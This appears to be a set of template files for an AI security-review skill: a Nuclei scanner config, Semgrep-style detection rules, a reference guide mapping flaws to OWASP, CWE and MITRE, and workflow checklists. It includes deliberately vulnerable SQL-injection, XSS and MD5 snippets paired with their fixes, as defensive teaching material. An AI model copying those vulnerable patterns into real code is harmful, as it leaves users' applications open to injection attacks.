# Include only specific templates
# include-templates:
# - /path/to/template.yaml
# Performance tuning
performance:
# Maximum number of templates to run
# max-templates: 1000
# Maximum number of hosts to scan
# max-hosts: 10000
# Memory optimization (reduces memory usage)
# stream: true
# Disable update check
# disable-update-check: false
# CI/CD specific settings
ci:
# Fail on findings (exit code 1 if vulnerabilities found)
# fail-on-severity:
# - critical
# - high
# No interactive prompts
# no-interaction: true
# Suppress progress bars
# no-progress: true
# Authentication configuration
authentication:
# For authenticated scanning, use headers or custom authentication scripts
# See authentication_patterns.md reference for details
# Example: Bearer token authentication
# headers:
# - "Authorization: Bearer ${API_TOKEN}"
# Example: Cookie-based authentication
# headers:
# - "Cookie: session=${SESSION_COOKIE}"
# Reporting configuration
reporting:
# Report directory
# report-directory: ./nuclei-reports
# Report format
# report-format: json
# Include timestamp in filenames
# include-timestamp: true
# Advanced configuration
advanced:
# Follow host redirects (allow redirects to different hosts)
# follow-host-redirects: false
# Maximum response body size to read (in KB)
# max-response-size: 10240
# Include request/response in output
# include-rr: false
# Store response
# store-response: false
# Store response directory
# store-response-dir: ./responses/
# Exclude configuration (global exclusions)
exclude:
# Exclude specific hosts
# hosts:
# - https://safe-domain.com
# - https://third-party.com
# Exclude URL patterns (regex)
# urls:
# - ".*\\.js$"
# - ".*\\.css$"
# - ".*logout.*"
# Interactsh configuration (for OAST testing)
interactsh:
# Enable interactsh
# enable: true
# Custom interactsh server
# server: https://interact.sh
# Disable automatic polling
# disable-polling: false
# Cloud configuration (for cloud-specific templates)
cloud:
# Enable cloud metadata service checks
# enable-metadata: true
# Debug configuration
debug:
# Enable debug mode
# enable: false
# Debug requests
# debug-req: false
# Debug responses
# debug-resp: false
# Example usage:
# nuclei -u https://target.com -config nuclei_config.yaml

View File

@@ -0,0 +1,355 @@
# Security Rule Template
#
# This template demonstrates how to structure security rules/policies.
# Adapt this template to your specific security tool (Semgrep, OPA, etc.)
#
# Rule Structure Best Practices:
# - Clear rule ID and metadata
# - Severity classification
# - Framework mappings (OWASP, CWE)
# - Remediation guidance
# - Example vulnerable and fixed code
rules:
# Example Rule 1: SQL Injection Detection
- id: sql-injection-string-concatenation
metadata:
name: "SQL Injection via String Concatenation"
description: "Detects potential SQL injection vulnerabilities from string concatenation in SQL queries"
severity: "HIGH"
category: "security"
subcategory: "injection"
# Security Framework Mappings
owasp:
- "A03:2021 - Injection"
cwe:
- "CWE-89: SQL Injection"
mitre_attack:
- "T1190: Exploit Public-Facing Application"
# Compliance Standards
compliance:
- "PCI-DSS 6.5.1: Injection flaws"
- "NIST 800-53 SI-10: Information Input Validation"
# Confidence and Impact
confidence: "HIGH"
likelihood: "HIGH"
impact: "HIGH"
# References
references:
- "https://owasp.org/www-community/attacks/SQL_Injection"
- "https://cwe.mitre.org/data/definitions/89.html"
- "https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html"
# Languages this rule applies to
languages:
- python
- javascript
- java
- go
# Detection Pattern (example using Semgrep-style syntax)
pattern-either:
- pattern: |
cursor.execute($SQL + $VAR)
- pattern: |
cursor.execute(f"... {$VAR} ...")
- pattern: |
cursor.execute("..." + $VAR + "...")
# What to report when found
message: |
Potential SQL injection vulnerability detected. SQL query is constructed using
string concatenation or f-strings with user input. This allows attackers to
inject malicious SQL code.
Use parameterized queries instead:
- Python: cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
- JavaScript: db.query("SELECT * FROM users WHERE id = $1", [userId])
See: https://owasp.org/www-community/attacks/SQL_Injection
# Suggested fix (auto-fix if supported)
fix: |
Use parameterized queries with placeholders
# Example vulnerable code
examples:
- vulnerable: |
# Vulnerable: String concatenation
user_id = request.GET['id']
query = "SELECT * FROM users WHERE id = " + user_id
cursor.execute(query)
- fixed: |
# Fixed: Parameterized query
user_id = request.GET['id']
query = "SELECT * FROM users WHERE id = ?"
cursor.execute(query, (user_id,))
# Example Rule 2: Hardcoded Secrets Detection
- id: hardcoded-secret-credential
metadata:
name: "Hardcoded Secret or Credential"
description: "Detects hardcoded secrets, API keys, passwords, or tokens in source code"
severity: "CRITICAL"
category: "security"
subcategory: "secrets"
owasp:
- "A07:2021 - Identification and Authentication Failures"
cwe:
- "CWE-798: Use of Hard-coded Credentials"
- "CWE-259: Use of Hard-coded Password"
compliance:
- "PCI-DSS 8.2.1: Use of strong cryptography"
- "SOC 2 CC6.1: Logical access controls"
- "GDPR Article 32: Security of processing"
confidence: "MEDIUM"
likelihood: "HIGH"
impact: "CRITICAL"
references:
- "https://cwe.mitre.org/data/definitions/798.html"
- "https://owasp.org/www-community/vulnerabilities/Use_of_hard-coded_password"
languages:
- python
- javascript
- java
- go
- ruby
pattern-either:
- pattern: |
password = "..."
- pattern: |
api_key = "..."
- pattern: |
secret = "..."
- pattern: |
token = "..."
pattern-not: |
$VAR = ""
message: |
Potential hardcoded secret detected. Hardcoding credentials in source code
is a critical security vulnerability that can lead to unauthorized access
if the code is exposed.
Use environment variables or a secrets management system instead:
- Python: os.environ.get('API_KEY')
- Node.js: process.env.API_KEY
- Secrets Manager: AWS Secrets Manager, HashiCorp Vault, etc.
See: https://cwe.mitre.org/data/definitions/798.html
examples:
- vulnerable: |
# Vulnerable: Hardcoded API key
api_key = "sk-1234567890abcdef"
api.authenticate(api_key)
- fixed: |
# Fixed: Environment variable
import os
api_key = os.environ.get('API_KEY')
if not api_key:
raise ValueError("API_KEY environment variable not set")
api.authenticate(api_key)
# Example Rule 3: XSS via Unsafe HTML Rendering
- id: xss-unsafe-html-rendering
metadata:
name: "Cross-Site Scripting (XSS) via Unsafe HTML"
description: "Detects unsafe HTML rendering that could lead to XSS vulnerabilities"
severity: "HIGH"
category: "security"
subcategory: "xss"
owasp:
- "A03:2021 - Injection"
cwe:
- "CWE-79: Cross-site Scripting (XSS)"
- "CWE-80: Improper Neutralization of Script-Related HTML Tags"
compliance:
- "PCI-DSS 6.5.7: Cross-site scripting"
- "NIST 800-53 SI-10: Information Input Validation"
confidence: "HIGH"
likelihood: "MEDIUM"
impact: "HIGH"
references:
- "https://owasp.org/www-community/attacks/xss/"
- "https://cwe.mitre.org/data/definitions/79.html"
- "https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"
languages:
- javascript
- typescript
- jsx
- tsx
pattern-either:
- pattern: |
dangerouslySetInnerHTML={{__html: $VAR}}
- pattern: |
innerHTML = $VAR
message: |
Potential XSS vulnerability detected. Setting HTML content directly from
user input without sanitization can allow attackers to inject malicious
JavaScript code.
Use one of these safe alternatives:
- React: Use {userInput} for automatic escaping
- DOMPurify: const clean = DOMPurify.sanitize(dirty);
- Framework-specific sanitizers
See: https://owasp.org/www-community/attacks/xss/
examples:
- vulnerable: |
// Vulnerable: Unsanitized HTML
function UserComment({ comment }) {
return <div dangerouslySetInnerHTML={{__html: comment}} />;
}
- fixed: |
// Fixed: Sanitized with DOMPurify
import DOMPurify from 'dompurify';
function UserComment({ comment }) {
const sanitized = DOMPurify.sanitize(comment);
return <div dangerouslySetInnerHTML={{__html: sanitized}} />;
}
# Example Rule 4: Insecure Cryptography
- id: weak-cryptographic-algorithm
metadata:
name: "Weak Cryptographic Algorithm"
description: "Detects use of weak or deprecated cryptographic algorithms"
severity: "HIGH"
category: "security"
subcategory: "cryptography"
owasp:
- "A02:2021 - Cryptographic Failures"
cwe:
- "CWE-327: Use of a Broken or Risky Cryptographic Algorithm"
- "CWE-326: Inadequate Encryption Strength"
compliance:
- "PCI-DSS 4.1: Use strong cryptography"
- "NIST 800-53 SC-13: Cryptographic Protection"
- "GDPR Article 32: Security of processing"
confidence: "HIGH"
likelihood: "MEDIUM"
impact: "HIGH"
references:
- "https://cwe.mitre.org/data/definitions/327.html"
- "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/"
languages:
- python
- javascript
- java
pattern-either:
- pattern: |
hashlib.md5(...)
- pattern: |
hashlib.sha1(...)
- pattern: |
crypto.createHash('md5')
- pattern: |
crypto.createHash('sha1')
message: |
Weak cryptographic algorithm detected (MD5 or SHA1). These algorithms are
considered cryptographically broken and should not be used for security purposes.
Use strong alternatives:
- For hashing: SHA-256, SHA-384, or SHA-512
- For password hashing: bcrypt, argon2, or PBKDF2
- Python: hashlib.sha256()
- Node.js: crypto.createHash('sha256')
See: https://cwe.mitre.org/data/definitions/327.html
examples:
- vulnerable: |
# Vulnerable: MD5 hash
import hashlib
hash_value = hashlib.md5(data).hexdigest()
- fixed: |
# Fixed: SHA-256 hash
import hashlib
hash_value = hashlib.sha256(data).hexdigest()
# Rule Configuration
configuration:
# Global settings
enabled: true
severity_threshold: "MEDIUM" # Report findings at MEDIUM severity and above
# Performance tuning
max_file_size_kb: 1024
exclude_patterns:
- "test/*"
- "tests/*"
- "node_modules/*"
- "vendor/*"
- "*.min.js"
# False positive reduction
confidence_threshold: "MEDIUM" # Only report findings with MEDIUM confidence or higher
# Rule Metadata Schema
# This section documents the expected structure for rules
metadata_schema:
required:
- id: "Unique identifier for the rule (kebab-case)"
- name: "Human-readable rule name"
- description: "What the rule detects"
- severity: "CRITICAL | HIGH | MEDIUM | LOW | INFO"
- category: "security | best-practice | performance"
optional:
- subcategory: "Specific type (injection, xss, secrets, etc.)"
- owasp: "OWASP Top 10 mappings"
- cwe: "CWE identifier(s)"
- mitre_attack: "MITRE ATT&CK technique(s)"
- compliance: "Compliance standard references"
- confidence: "Detection confidence level"
- likelihood: "Likelihood of exploitation"
- impact: "Potential impact if exploited"
- references: "External documentation links"
# Usage Instructions:
#
# 1. Copy this template when creating new security rules
# 2. Update metadata fields with appropriate framework mappings
# 3. Customize detection patterns for your tool (Semgrep, OPA, etc.)
# 4. Provide clear remediation guidance in the message field
# 5. Include both vulnerable and fixed code examples
# 6. Test rules on real codebases before deployment
#
# Best Practices:
# - Map to multiple frameworks (OWASP, CWE, MITRE ATT&CK)
# - Include compliance standard references
# - Provide actionable remediation guidance
# - Show code examples (vulnerable vs. fixed)
# - Tune confidence levels to reduce false positives
# - Exclude test directories to reduce noise

View File

@@ -0,0 +1,550 @@
# Reference Document Template
This file demonstrates how to structure detailed reference material that Claude loads on-demand.
**When to use this reference**: Include a clear statement about when Claude should consult this document.
For example: "Consult this reference when analyzing Python code for security vulnerabilities and needing detailed remediation patterns."
**Document purpose**: Briefly explain what this reference provides that's not in SKILL.md.
---
## Table of Contents
**For documents >100 lines, always include a table of contents** to help Claude navigate quickly.
- [When to Use References](#when-to-use-references)
- [Document Organization](#document-organization)
- [Detailed Technical Content](#detailed-technical-content)
- [Security Framework Mappings](#security-framework-mappings)
- [OWASP Top 10](#owasp-top-10)
- [CWE Mappings](#cwe-mappings)
- [MITRE ATT&CK](#mitre-attck)
- [Remediation Patterns](#remediation-patterns)
- [Advanced Configuration](#advanced-configuration)
- [Examples and Code Samples](#examples-and-code-samples)
---
## When to Use References
**Move content from SKILL.md to references/** when:
1. **Content exceeds 100 lines** - Keep SKILL.md concise
2. **Framework-specific details** - Detailed OWASP/CWE/MITRE mappings
3. **Advanced user content** - Deep technical details for expert users
4. **Lookup-oriented content** - Rule libraries, configuration matrices, comprehensive lists
5. **Language-specific patterns** - Separate files per language/framework
6. **Historical context** - Old patterns and deprecated approaches
**Keep in SKILL.md**:
- Core workflows (top 3-5 use cases)
- Decision points and branching logic
- Quick start guidance
- Essential security considerations
---
## Document Organization
### Structure for Long Documents
For references >100 lines:
```markdown
# Title
**When to use**: Clear trigger statement
**Purpose**: What this provides
## Table of Contents
- Links to all major sections
## Quick Reference
- Key facts or commands for fast lookup
## Detailed Content
- Comprehensive information organized logically
## Framework Mappings
- OWASP, CWE, MITRE ATT&CK references
## Examples
- Code samples and patterns
```
### Section Naming Conventions
- Use **imperative** or **declarative** headings
- ✅ "Detecting SQL Injection" not "How to detect SQL Injection"
- ✅ "Common Patterns" not "These are common patterns"
- Make headings **searchable** and **specific**
---
## Detailed Technical Content
This section demonstrates the type of detailed content that belongs in references rather than SKILL.md.
### Example: Comprehensive Vulnerability Detection
#### SQL Injection Detection Patterns
**Pattern 1: String Concatenation in Queries**
```python
# Vulnerable pattern
query = "SELECT * FROM users WHERE id = " + user_id
cursor.execute(query)
# Detection criteria:
# - SQL keyword (SELECT, INSERT, UPDATE, DELETE)
# - String concatenation operator (+, f-string)
# - Variable user input (request params, form data)
# Severity: HIGH
# CWE: CWE-89
# OWASP: A03:2021 - Injection
```
**Remediation**:
```python
# Fixed: Parameterized query
query = "SELECT * FROM users WHERE id = ?"
cursor.execute(query, (user_id,))
# OR using ORM
user = User.objects.get(id=user_id)
```
**Pattern 2: Unsafe String Formatting**
```python
# Vulnerable patterns
query = f"SELECT * FROM users WHERE name = '{username}'"
query = "SELECT * FROM users WHERE name = '%s'" % username
query = "SELECT * FROM users WHERE name = '{}'".format(username)
# All three patterns are vulnerable to SQL injection
```
#### Cross-Site Scripting (XSS) Detection
**Pattern 1: Unescaped Output in Templates**
```javascript
// Vulnerable: Direct HTML injection
element.innerHTML = userInput;
document.write(userInput);
// Vulnerable: React dangerouslySetInnerHTML
<div dangerouslySetInnerHTML={{__html: userComment}} />
// Detection criteria:
// - Direct DOM manipulation (innerHTML, document.write)
// - React dangerouslySetInnerHTML with user data
// - Template engines with autoescaping disabled
// Severity: HIGH
// CWE: CWE-79
// OWASP: A03:2021 - Injection
```
**Remediation**:
```javascript
// Fixed: Escaped output
element.textContent = userInput; // Auto-escapes
// Fixed: Sanitization library
import DOMPurify from 'dompurify';
const clean = DOMPurify.sanitize(userComment);
<div dangerouslySetInnerHTML={{__html: clean}} />
```
---
## Security Framework Mappings
This section provides comprehensive security framework mappings for findings.
### OWASP Top 10
Map security findings to OWASP Top 10 (2021) categories:
| Category | Title | Common Vulnerabilities |
|----------|-------|----------------------|
| **A01:2021** | Broken Access Control | Authorization bypass, privilege escalation, IDOR |
| **A02:2021** | Cryptographic Failures | Weak crypto, plaintext storage, insecure TLS |
| **A03:2021** | Injection | SQL injection, XSS, command injection, LDAP injection |
| **A04:2021** | Insecure Design | Missing security controls, threat modeling gaps |
| **A05:2021** | Security Misconfiguration | Default configs, verbose errors, unnecessary features |
| **A06:2021** | Vulnerable Components | Outdated libraries, unpatched dependencies |
| **A07:2021** | Auth & Session Failures | Weak passwords, session fixation, missing MFA |
| **A08:2021** | Software & Data Integrity | Unsigned updates, insecure CI/CD, deserialization |
| **A09:2021** | Logging & Monitoring Failures | Insufficient logging, no alerting, log injection |
| **A10:2021** | SSRF | Server-side request forgery, unvalidated redirects |
**Usage**: When reporting findings, map to primary OWASP category and reference the identifier (e.g., "A03:2021 - Injection").
### CWE Mappings
Map to relevant Common Weakness Enumeration categories for precise vulnerability classification:
#### Injection Vulnerabilities
- **CWE-78**: OS Command Injection
- **CWE-79**: Cross-site Scripting (XSS)
- **CWE-89**: SQL Injection
- **CWE-90**: LDAP Injection
- **CWE-91**: XML Injection
- **CWE-94**: Code Injection
#### Authentication & Authorization
- **CWE-287**: Improper Authentication
- **CWE-288**: Authentication Bypass Using Alternate Path
- **CWE-290**: Authentication Bypass by Spoofing
- **CWE-294**: Authentication Bypass by Capture-replay
- **CWE-306**: Missing Authentication for Critical Function
- **CWE-307**: Improper Restriction of Excessive Authentication Attempts
- **CWE-352**: Cross-Site Request Forgery (CSRF)
#### Cryptographic Issues
- **CWE-256**: Plaintext Storage of Password
- **CWE-259**: Use of Hard-coded Password
- **CWE-261**: Weak Encoding for Password
- **CWE-321**: Use of Hard-coded Cryptographic Key
- **CWE-326**: Inadequate Encryption Strength
- **CWE-327**: Use of Broken or Risky Cryptographic Algorithm
- **CWE-329**: Not Using a Random IV with CBC Mode
- **CWE-798**: Use of Hard-coded Credentials
#### Input Validation
- **CWE-20**: Improper Input Validation
- **CWE-73**: External Control of File Name or Path
- **CWE-434**: Unrestricted Upload of File with Dangerous Type
- **CWE-601**: URL Redirection to Untrusted Site
#### Sensitive Data Exposure
- **CWE-200**: Information Exposure
- **CWE-209**: Information Exposure Through Error Message
- **CWE-312**: Cleartext Storage of Sensitive Information
- **CWE-319**: Cleartext Transmission of Sensitive Information
- **CWE-532**: Information Exposure Through Log Files
**Usage**: Include CWE identifier in all vulnerability reports for standardized classification.
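The sketch below shows one way a finding record can carry these identifiers alongside severity so reports stay aligned with the OWASP and CWE mappings above; the field names and the example finding are illustrative rather than a fixed schema.
```python
# Minimal sketch: attach OWASP / CWE identifiers to a finding record.
# Field names and the example finding are illustrative, not a fixed schema.
from dataclasses import dataclass, field

@dataclass
class Finding:
    title: str
    severity: str                                  # CRITICAL | HIGH | MEDIUM | LOW | INFO
    owasp: str                                     # e.g. "A03:2021 - Injection"
    cwe: list[str] = field(default_factory=list)   # e.g. ["CWE-89"]
    location: str = ""

finding = Finding(
    title="SQL injection in user lookup",
    severity="HIGH",
    owasp="A03:2021 - Injection",
    cwe=["CWE-89"],
    location="app/db/users.py:42",
)

print(f"[{finding.severity}] {finding.title} ({finding.owasp}; {', '.join(finding.cwe)})")
```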
### MITRE ATT&CK
Reference relevant tactics and techniques for threat context:
#### Initial Access (TA0001)
- **T1190**: Exploit Public-Facing Application
- **T1133**: External Remote Services
- **T1078**: Valid Accounts
#### Execution (TA0002)
- **T1059**: Command and Scripting Interpreter
- **T1203**: Exploitation for Client Execution
#### Persistence (TA0003)
- **T1098**: Account Manipulation
- **T1136**: Create Account
- **T1505**: Server Software Component
#### Privilege Escalation (TA0004)
- **T1068**: Exploitation for Privilege Escalation
- **T1548**: Abuse Elevation Control Mechanism
#### Defense Evasion (TA0005)
- **T1027**: Obfuscated Files or Information
- **T1140**: Deobfuscate/Decode Files or Information
- **T1562**: Impair Defenses
#### Credential Access (TA0006)
- **T1110**: Brute Force
- **T1555**: Credentials from Password Stores
- **T1552**: Unsecured Credentials
#### Discovery (TA0007)
- **T1083**: File and Directory Discovery
- **T1046**: Network Service Scanning
#### Collection (TA0009)
- **T1005**: Data from Local System
- **T1114**: Email Collection
#### Exfiltration (TA0010)
- **T1041**: Exfiltration Over C2 Channel
- **T1567**: Exfiltration Over Web Service
**Usage**: When identifying vulnerabilities, consider which ATT&CK techniques an attacker could use to exploit them.
---
## Remediation Patterns
This section provides specific remediation guidance for common vulnerability types.
### SQL Injection Remediation
**Step 1: Identify vulnerable queries**
- Search for string concatenation in SQL queries
- Check for f-strings or format() with SQL keywords
- Review all database interaction code
**Step 2: Apply parameterized queries**
```python
# Python with sqlite3
cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
# Python with psycopg2 (PostgreSQL)
cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))
# Python with SQLAlchemy (ORM)
from sqlalchemy import text
result = session.execute(text("SELECT * FROM users WHERE id = :id"), {"id": user_id})
```
**Step 3: Validate and sanitize input** (defense in depth)
```python
import re
# Validate input format
if not re.match(r'^\d+$', user_id):
raise ValueError("Invalid user ID format")
# Use ORM query builders
user = User.query.filter_by(id=user_id).first()
```
**Step 4: Implement least privilege**
- Database user should have minimum required permissions
- Use read-only accounts for SELECT operations
- Never use admin/root accounts for application queries
### XSS Remediation
**Step 1: Enable auto-escaping**
- Most modern frameworks escape by default
- Ensure auto-escaping is not disabled
**Step 2: Use framework-specific safe methods**
```javascript
// React: Use JSX (auto-escapes)
<div>{userInput}</div>
// Vue: Use template syntax (auto-escapes)
<div>{{ userInput }}</div>
// Angular: Use property binding (auto-escapes)
<div [textContent]="userInput"></div>
```
**Step 3: Sanitize when HTML is required**
```javascript
import DOMPurify from 'dompurify';
// Sanitize HTML content
const clean = DOMPurify.sanitize(userHTML, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'p'],
ALLOWED_ATTR: []
});
```
**Step 4: Content Security Policy (CSP)**
```html
<!-- Add CSP header -->
Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-{random}'
```
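As a server-side companion to Step 4, here is a minimal Flask sketch that sets the CSP header on every response; the policy string and the per-request nonce handling are illustrative and should be adapted to your application.
```python
# Minimal sketch: set a Content-Security-Policy header on every Flask response.
# The policy string is illustrative; tighten it for your real asset origins.
import secrets
from flask import Flask, g

app = Flask(__name__)

@app.before_request
def generate_csp_nonce():
    # Fresh nonce per request so inline scripts can be allow-listed safely
    g.csp_nonce = secrets.token_urlsafe(16)

@app.after_request
def set_csp_header(response):
    response.headers["Content-Security-Policy"] = (
        f"default-src 'self'; script-src 'self' 'nonce-{g.csp_nonce}'"
    )
    return response
```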
---
## Advanced Configuration
This section contains detailed configuration options and tuning parameters.
### Example: SAST Tool Configuration
```yaml
# Advanced security scanner configuration
scanner:
# Severity threshold
severity_threshold: MEDIUM
# Rule configuration
rules:
enabled:
- sql-injection
- xss
- hardcoded-secrets
disabled:
- informational-only
# False positive reduction
confidence_threshold: HIGH
exclude_patterns:
- "*/test/*"
- "*/tests/*"
- "*/node_modules/*"
- "*.test.js"
- "*.spec.ts"
# Performance tuning
max_file_size_kb: 2048
timeout_seconds: 300
parallel_jobs: 4
# Output configuration
output_format: json
include_code_snippets: true
max_snippet_lines: 10
```
---
## Examples and Code Samples
This section provides comprehensive code examples for various scenarios.
### Example 1: Secure API Authentication
```python
# Secure API key handling
import os
from functools import wraps
from flask import Flask, request, jsonify
app = Flask(__name__)
# Load API key from environment (never hardcode)
VALID_API_KEY = os.environ.get('API_KEY')
if not VALID_API_KEY:
raise ValueError("API_KEY environment variable not set")
def require_api_key(f):
@wraps(f)
def decorated_function(*args, **kwargs):
api_key = request.headers.get('X-API-Key')
if not api_key:
return jsonify({'error': 'API key required'}), 401
# Constant-time comparison to prevent timing attacks
import hmac
if not hmac.compare_digest(api_key, VALID_API_KEY):
return jsonify({'error': 'Invalid API key'}), 403
return f(*args, **kwargs)
return decorated_function
@app.route('/api/secure-endpoint')
@require_api_key
def secure_endpoint():
return jsonify({'message': 'Access granted'})
```
### Example 2: Secure Password Hashing
```python
# Secure password storage with bcrypt
import bcrypt
def hash_password(password: str) -> str:
"""Hash a password using bcrypt."""
# Generate salt and hash password
salt = bcrypt.gensalt(rounds=12) # Cost factor: 12 (industry standard)
hashed = bcrypt.hashpw(password.encode('utf-8'), salt)
return hashed.decode('utf-8')
def verify_password(password: str, hashed: str) -> bool:
"""Verify a password against a hash."""
return bcrypt.checkpw(
password.encode('utf-8'),
hashed.encode('utf-8')
)
# Usage
stored_hash = hash_password("user_password")
is_valid = verify_password("user_password", stored_hash) # True
```
### Example 3: Secure File Upload
```python
# Secure file upload with validation
import os
import magic
from werkzeug.utils import secure_filename
ALLOWED_EXTENSIONS = {'pdf', 'png', 'jpg', 'jpeg'}
ALLOWED_MIME_TYPES = {
'application/pdf',
'image/png',
'image/jpeg'
}
MAX_FILE_SIZE = 5 * 1024 * 1024 # 5 MB
def is_allowed_file(filename: str, file_content: bytes) -> bool:
"""Validate file extension and MIME type."""
# Check extension
if '.' not in filename:
return False
ext = filename.rsplit('.', 1)[1].lower()
if ext not in ALLOWED_EXTENSIONS:
return False
# Check MIME type (prevent extension spoofing)
mime = magic.from_buffer(file_content, mime=True)
if mime not in ALLOWED_MIME_TYPES:
return False
return True
def handle_upload(file):
"""Securely handle file upload."""
# Check file size
file.seek(0, os.SEEK_END)
size = file.tell()
file.seek(0)
if size > MAX_FILE_SIZE:
raise ValueError("File too large")
# Read content for validation
content = file.read()
file.seek(0)
# Validate file type
if not is_allowed_file(file.filename, content):
raise ValueError("Invalid file type")
# Sanitize filename
filename = secure_filename(file.filename)
# Generate unique filename to prevent overwrite attacks
import uuid
unique_filename = f"{uuid.uuid4()}_{filename}"
# Save to secure location (outside web root)
upload_path = os.path.join('/secure/uploads', unique_filename)
file.save(upload_path)
return unique_filename
```
---
## Best Practices for Reference Documents
1. **Start with "When to use"** - Help Claude know when to load this reference
2. **Include table of contents** - For documents >100 lines
3. **Use concrete examples** - Code samples with vulnerable and fixed versions
4. **Map to frameworks** - OWASP, CWE, MITRE ATT&CK for context
5. **Provide remediation** - Don't just identify issues, show how to fix them
6. **Organize logically** - Group related content, use clear headings
7. **Keep examples current** - Use modern patterns and current framework versions
8. **Be concise** - Even in references, challenge every sentence

View File

@@ -0,0 +1,253 @@
# Workflow Checklist Template
This template demonstrates workflow patterns for security operations. Copy and adapt these checklists to your specific skill needs.
## Pattern 1: Sequential Workflow Checklist
Use this pattern for operations that must be completed in order, step-by-step.
### Security Assessment Workflow
Progress:
[ ] 1. Identify application entry points and attack surface
[ ] 2. Map authentication and authorization flows
[ ] 3. Identify data flows and sensitive data handling
[ ] 4. Review existing security controls
[ ] 5. Document findings with framework references (OWASP, CWE)
[ ] 6. Prioritize findings by severity (CVSS scores)
[ ] 7. Generate report with remediation recommendations
Work through each step systematically. Check off completed items.
---
## Pattern 2: Conditional Workflow
Use this pattern when the workflow branches based on findings or conditions.
### Vulnerability Remediation Workflow
1. Identify vulnerability type
- If SQL Injection → See [sql-injection-remediation.md](sql-injection-remediation.md)
- If XSS (Cross-Site Scripting) → See [xss-remediation.md](xss-remediation.md)
- If Authentication flaw → See [auth-remediation.md](auth-remediation.md)
- If Authorization flaw → See [authz-remediation.md](authz-remediation.md)
- If Cryptographic issue → See [crypto-remediation.md](crypto-remediation.md)
2. Assess severity using CVSS calculator (a scoring helper sketch follows this workflow)
- If CVSS >= 9.0 → Priority: Critical (immediate action)
- If CVSS 7.0-8.9 → Priority: High (action within 24h)
- If CVSS 4.0-6.9 → Priority: Medium (action within 1 week)
- If CVSS < 4.0 → Priority: Low (action within 30 days)
3. Apply appropriate remediation pattern
4. Validate fix with security testing
5. Document changes and update security documentation
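The CVSS thresholds from step 2 above can be encoded as a small helper so every finding is routed the same way; a minimal sketch, with the SLA strings taken from the workflow:
```python
# Minimal sketch of the CVSS-to-priority thresholds from step 2 above.
def cvss_priority(score: float) -> tuple[str, str]:
    """Map a CVSS base score to (priority, remediation SLA)."""
    if score >= 9.0:
        return "Critical", "immediate action"
    if score >= 7.0:
        return "High", "within 24 hours"
    if score >= 4.0:
        return "Medium", "within 1 week"
    return "Low", "within 30 days"

print(cvss_priority(9.8))   # ('Critical', 'immediate action')
print(cvss_priority(5.3))   # ('Medium', 'within 1 week')
```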
---
## Pattern 3: Iterative Workflow
Use this pattern for operations that repeat across multiple targets or items.
### Code Security Review Workflow
For each file in the review scope:
1. Identify security-sensitive operations (auth, data access, crypto, input handling)
2. Check against secure coding patterns for the language
3. Flag potential vulnerabilities with severity rating
4. Map findings to CWE and OWASP categories
5. Suggest specific remediation approaches
6. Document finding with code location and fix priority
Continue until all files in scope have been reviewed.
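A minimal sketch of the per-file loop above, assuming sources live under `src/` and using two illustrative regex checks (hardcoded secrets, string-built SQL); a real review would lean on a SAST engine such as Semgrep rather than ad-hoc patterns.
```python
# Minimal sketch of the per-file review loop with two illustrative regex checks.
# Patterns and the src/ path are assumptions; use a SAST engine for real reviews.
import re
from pathlib import Path

CHECKS = {
    "hardcoded-secret (CWE-798)": re.compile(
        r"(password|api_key|secret|token)\s*=\s*['\"][^'\"]+['\"]", re.I
    ),
    "string-built SQL (CWE-89)": re.compile(r"execute\([^)]*(\+|%|\.format\()", re.I),
}

def review_file(path: Path) -> list[str]:
    findings = []
    for lineno, line in enumerate(path.read_text(errors="ignore").splitlines(), start=1):
        for name, pattern in CHECKS.items():
            if pattern.search(line):
                findings.append(f"{path}:{lineno}: {name}")
    return findings

for file in Path("src").rglob("*.py"):
    for finding in review_file(file):
        print(finding)
```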
---
## Pattern 4: Feedback Loop Workflow
Use this pattern when validation and iteration are required.
### Secure Configuration Generation Workflow
1. Generate initial security configuration based on requirements
2. Run validation script: `./scripts/validate_config.py config.yaml`
3. Review validation output:
- Note all errors (must fix)
- Note all warnings (should fix)
- Note all info items (consider)
4. Fix identified issues in configuration
5. Repeat steps 2-4 until validation passes with zero errors
6. Review warnings and determine if they should be addressed
7. Apply configuration once validation is clean
**Validation Loop**: Run validator → Fix errors → Repeat until clean
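For context, here is a minimal sketch of what a validator like `scripts/validate_config.py` might look like; the checked keys are illustrative assumptions, and the non-zero exit on errors is what gives the loop a clear pass/fail signal.
```python
#!/usr/bin/env python3
# Minimal sketch of a config validator for the feedback loop above.
# The checked keys are illustrative; adapt them to your configuration schema.
import sys
import yaml  # PyYAML

def validate(config: dict) -> tuple[list[str], list[str]]:
    errors, warnings = [], []
    if config.get("debug") is True:
        errors.append("debug must be disabled in production")
    if not config.get("tls", {}).get("enabled", False):
        errors.append("TLS must be enabled")
    if config.get("session_timeout_minutes", 0) > 60:
        warnings.append("session timeout above 60 minutes")
    return errors, warnings

if __name__ == "__main__":
    config = yaml.safe_load(open(sys.argv[1])) or {}
    errors, warnings = validate(config)
    for e in errors:
        print(f"ERROR: {e}")
    for w in warnings:
        print(f"WARNING: {w}")
    sys.exit(1 if errors else 0)
```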
---
## Pattern 5: Parallel Analysis Workflow
Use this pattern when multiple independent analyses can run concurrently.
### Comprehensive Security Scan Workflow
Run these scans in parallel:
**Static Analysis**:
[ ] 1a. Run SAST scan (Semgrep/Bandit)
[ ] 1b. Run dependency vulnerability scan (Safety/npm audit)
[ ] 1c. Run secrets detection (Gitleaks/TruffleHog)
[ ] 1d. Run license compliance check
**Dynamic Analysis**:
[ ] 2a. Run DAST scan (ZAP/Burp)
[ ] 2b. Run API security testing
[ ] 2c. Run authentication/authorization testing
**Infrastructure Analysis**:
[ ] 3a. Run infrastructure-as-code scan (Checkov/tfsec)
[ ] 3b. Run container image scan (Trivy/Grype)
[ ] 3c. Run configuration review
**Consolidation**:
[ ] 4. Aggregate all findings
[ ] 5. Deduplicate and correlate findings
[ ] 6. Prioritize by risk (CVSS + exploitability + business impact)
[ ] 7. Generate unified security report
